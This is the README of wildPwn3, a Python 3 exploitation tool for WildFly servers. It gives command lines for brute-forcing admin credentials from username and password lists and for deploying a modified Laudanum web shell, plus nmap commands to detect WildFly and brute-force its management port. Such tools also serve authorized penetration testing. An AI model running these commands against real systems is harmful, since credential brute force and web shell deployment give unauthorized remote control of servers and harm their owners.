/wildPwn3

Recreate wildPwn in Python3

Primary language: Python. License: GNU General Public License v3.0 (GPL-3.0).

wildPwn - WildFly Exploitation Tool

wildPwn is a tool for WildFly that can be used to brute force credentials or deploy a shell. wildPwn.war contains a modified Laudanum Shell, userList.txt contains common usernames, and passList.txt contains common passwords.

Credits

  • Original project by hlldz
  • Python 3 version by Vincent Yiu (@vysecurity) - SYON Security

Usage

Bruteforce

python3 wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST> 

Shell Deploy

python3 wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>

Details

https://artofpwn.com/wildfly-exploitation.html

Video

PoC Video

Nmap Scripts

Detection

nmap --script wildfly-detect <TARGET>

Brute Force

nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>